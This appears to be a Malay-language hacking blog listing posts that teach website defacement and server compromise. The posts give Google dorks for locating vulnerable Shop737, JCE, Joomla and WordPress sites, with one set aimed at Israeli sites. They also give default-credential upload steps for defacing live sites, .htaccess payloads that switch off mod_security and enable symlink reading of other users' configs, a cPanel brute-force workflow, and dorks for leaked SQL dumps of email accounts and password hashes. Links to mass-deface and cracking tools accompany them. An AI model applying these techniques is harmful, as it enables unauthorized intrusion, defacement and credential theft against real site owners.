Cara Rooting Server [2.6.32-2012] Video

Assalamualaikum dan selamat sejahtera , kali ini tutorial special sedikit . Haaaa ni cara tutorial cara root server . 

#Maaf kerana tutorial nya dalam bahasa inggeris . Bajet2 OhMyEngelish jeww .. Hahahahaa

Video 

Download File 

Termasuk file a.zip dan mass.zip

Semoga bermanfaat .

Read More →

Zone-h Mass Notify [PHP]

Assalamualaikum dan selamat sejahtera . Kali ini saya akan berkongsi Zone-h Mass Notify , Tool ini sangat berguna baru semalam baru saya guna , dan boleh di guna dan sangat laju . Terima kasih Afif Zafri kerana sudi berkongsi tool ini kepada saya . Boleh singgah blog Afif Reaperz Blog .

Download Link

Itu sahaja , semoga bermanfaat . Assalamualaikum

Read More →

Deface Dengan Upload File di Shop737

Assalamualaikum dan selamat sejahtera , Kali ini saya akan berkongsi exploit Upload file Di Cms Shop737 . Exploit ini amat mudah .

Baiklah .. Jom mula

Google Dork : intext:"Powered by Shop737"

1) Pilih target website . 

2 ) Kemudian tambah /upload.php Seperti site.com/poto/upload.php . Contoh: http://lagudrumband.com/poto/upload.php

3) Masukkan user + pass 

username : admin

pass : admin

 4) Jika gagal masuk , coba website lain :)

5) Setelah berjaya masuk tampilan akan jadi begini .

6) Hanya file extension .txt/.jpg sahaja yg boleh di upload .

7) Pilih kategori dan upload file anda dan klik Upload :)

8) Jike file sukses di upload 

hasil upload berjaya di : localhost/poto/[kategori]/file.txt . Contoh http://lagudrumband.com/poto/x/x.txt

Itu sahaja . Assalamualaikum :)

 

Read More →

Automatic Joomla Password Changer

Assalamualaikum dan Selamat sejahtera , Kali ini saya akan berkongsi berkaitan tool Joomla , iaitu dapat mass Joomla Password Changer .Yang menariknya korang tak payah symlink cara manual dan menyari website joomla . Tool ini akan bersiap sedia menjalankan kerja nya . Hehehe

Tanda ' Successful ' maknanya anda sudah berjaya mass .

Tanda ' Failed ' maknanya ada masalah di bahagian ' administrator ' 

Selepas itu masukkan username dan password ini di administrator Joomla

Username : Admin
Password : 1

Login Successfully =)

Download Link

Itu sahaja , Assalamualaikum ..

Read More →

JCE Exploiter

Assalamualaikum dan selamat sejahtera . Sudah lama saya tak buat artikel hacking , maaf . Tidak ada masa untuk berblogging . tapi sekarang saya akan kembali untuk berkongsi . Dengan nama blog baru Mafia Security.

Jom mula ..

Download dulu ..

Google Dork : inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart

Jika tidak keluar apa2 itu tandanya web patch atau tidak vuln .
Exploit JCE ini masih fresh walaupun exploit ini sejak 2009 . Best exploit !
Assalamualaikum dan selamat sejahtera .

Read More →

Automatic Joomla Mass Deface

Assalamualaikum dan selamat sejahtera , maaf sudah lama GSEC tidak update tutorial , sebab baru habis bercuti sempena 'GONG XI FA CAI' hehehhe . Baiklah , sebagai tutorial ini GSEC sudah buat satu video . Dan Qualiti video ini sangat buruk . Maaf ..Tetapi boleh lebih jelas hanya tukar Qualiti ke 480 p . Video Download File Password download : mansyk3z

Read More →

Bypass Symlink Error

Assalamualaikum dan selamat sejahtera , Mungkin,ramai PENGGODAM/DEFACER mengalami masalah apabila mendapat sebuah server ataupun shell . Disitu apabila ingin SYM , tiba-tiba ada mengalami Forbidden,Internal Server Error dan 404 NOT FOUND . Baiklah kali ini saya akan tunjuk cara ingin bypass Error itu :) .

Bypass symlink dengan .htaccess/code . Copy code dan upload di shell ok . Code .htaccess untuk bypass Forbidden : * Options FollowSymLinks MultiViews Indexes ExecCGI

* Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php

* Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

*  Options All ReadMeName 1.txt

*  suPHP_ConfigPath /home/user/public_html/php.ini

*  Options all

* Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html

* Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

Code untuk bypass Python Script Sym .py : * AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py Code untuk bypass Perl Script Sym .pl : * AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .pl Code untuk membolehkan Fungsi Symlink yang telah dilumpuhkan : * <Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </Directory> Code untuk mendapatkan kebenaran dari server : * AddType text/plain .php Options +Indexes DirectoryIndex filename.html Code Bypass Internal Server Error : <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

Code Tukar Versi PHP dari Server :

*AddType application/x-httpd-php4 .php

Code Ambil Config dengan kaedah gambar : Options FollowSymLinks MultiViews Indexes ExecCGI  
AddType application/x-httpd-cgi .gif  
AddHandler cgi-script .gif
AddHandler cgi-script .gif
Itu sahaja , Assalamualaikum .

Read More →

Wordpress Scanner v.1

Assalamualaikum dan selamat sejahtera , Baiklah kali ni saya akan berkongsi Wordpress Scanner . Dengan Cara pemakaian ini korang mesti lah install python 2.5/2.7 di Code oleh Mauritania Attacker . My Lovely Brother :D . Tools ini berfungsi menginject web yang berCMS Wordpress . Hanya letak website target anda ^_^ . Method yang di jalankan SQLI ,RFI,CGI

Bila sudah download , copy/cut file wordpress ke C:/ dan bukak cmd jalankan  cd/ cd /wordpress wordpress.py Contoh

Download

Read More →

Hack Email guna Google

Assalamualaikum Semua :) Harini saya nak cerita tentang Exploit yang dijumpai Pihak GSEC dan MSEC dalam Google !  Seperti yang kita tahu , Google tidak melakukan sebarang penapisan dan tidak menyembunyikan File External . Jadi aku akan tunjuk cara yang mudah supaya korang mudah dapat dan faham :D Just pergi ke : www.Google.com  Untuk cari account @facebook type ni kat google : ext:sql intext:@facebook.com intext:e10adc3949ba59abbe56e057f20f883e Untuk cari account @Gmail :  ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e Untuk cari account @Yahoo : ext:sql intext:@yahoo.com intext:e10adc3949ba59abbe56e057f20f883e *Secara dasarnya , korang dah boleh nampak kan ? Kalau nak cari domain lain just tukar @yahoo.com jadi domain @hotmail pulak ker . Simple sangat tutorial ni :) Enjoy !

Read More →

Bypass etc/passwd

Assalamualaikum dan selamat sejahtera . Dengan tools ini korang boleh bypass etc/password . Server mestilah bypass . 

Click di bahagian /etc/passwd dan click submit .  Jika ada keluar error itu maksudnya server secure . Enjoy . Download  

Read More →

Cara Crack Cpanel menggunakan Config Symlink

Assalamualaikum .. Hari ni man nak ajar tutorial special iaitu Crack cpanel !
Bahan2 yang anda perlukan .

1) Python27
2) Script python [ss.py] wordlist 
3) Cpanel Brute Force
4) Symlink Bypassed [CONFIG]

Download dulu file nya ..

http://www.mediafire.com/?8f8k4j5ve12z49f <-- ss.py

http://www.mediafire.com/?925c2a0y79944n6 <-- Cpanel Brute Force

Selepas Python27 sudah install , masukkan file ss.py ke dalam C:\Python27 Dan buat nama satu folder apa2 .. Contoh nama 'Man Kacak' pun boleh

Setelah itu ,  bukak cmd dan type .
CD/
cd python27
ss.py htttp://site.com/namasymlinkanda [nama folder symlinked yang anda buat ]

Tunggu Scan sampai habis nanti akan dapat result begini .

Upload pulak Cpanel Brute Force .



Tekan user di bawah untuk mendapatkan user dari server terus masukkan ke dalam kotak 'USER' dan Masukkan pulak  'PASS' yang telah di crackkan tadi dan masukkan ke dalam 'PASS' 

Yeyyy ! Dah dapat cpanel !! Kalau korang dapat banyak config banyak lah cpanel  ..

Macam mana nak login ? pergi check dekat shell balik ambik server ip .

Contoh : 1212.1223.12:2082

Read More →

Hack Joomla dan Wordpress

Assalamualaikum dan selamat sejahtera , saya akan tunjukkan 'METHOD TERBAIK' cara Hack Joomla Dan Wordpress . Ini bukanlah exploit contoh exploit selalu terdapat di bahagian Components & Plugins . Dengan Exploit boleh memakai banyak method seperti reset admin/password ,SQL,XSS,dll.. Dengan Tools ini saya akan tunjukkan cara menggunakan tools ini , Tools ini sebenarnya adalah PRIV8 ,  Pertama , kita akan menggunakan 'BEST SEARCHER' lagi bagus dari google karna ia amat pantas untuk mencari website .

Pertama , Click Tumunu Isaretle untuk memilih semua method dan di dalam ruang berwarna hitam perlu meletakkan DORKS . korang boleh letak banyak DORKS sebagai target . Selepas itu . pergi ke Ruang ke dua click MENU TARAMA  dan click  Taramaya Basla . Apabila Research sudah habis/siap click Kaydet dan save file text . Contoh saya akan hack bberapa site israel menggunakan joomla/wordpress DORKS . Untuk Joomla

site:il com_user.israel
site:il option=
site:il templates/beez/
site:il template/atomic
site:il com_user.shalom
site:il com_user.shalit



Untuk Wordpress


site:il wp-content
site:il powered by wordpress
site:il wp-content/themes
site:il wp-content/plugins
site:il ?p= wordpress

Dan selepas itu kita akan menggunakan BEST CRACKER ^_^

Jangan lupa bila nak hack joomla atau wordpress pilih salah satu dulu , Sekarang kita perlukan wordlist yang bagus , Tekan sifre kelimelistesi untuk memilih password list dan click site ekle untuk memilih website yang file text waktu kita Searcher website tadi .dan click Basla untuk memulakan serangann !!  Saya uploadkan file programs dan wordlist cun cun punya .  Download sini  Selamat mencoba . Assalamualaikum

Read More →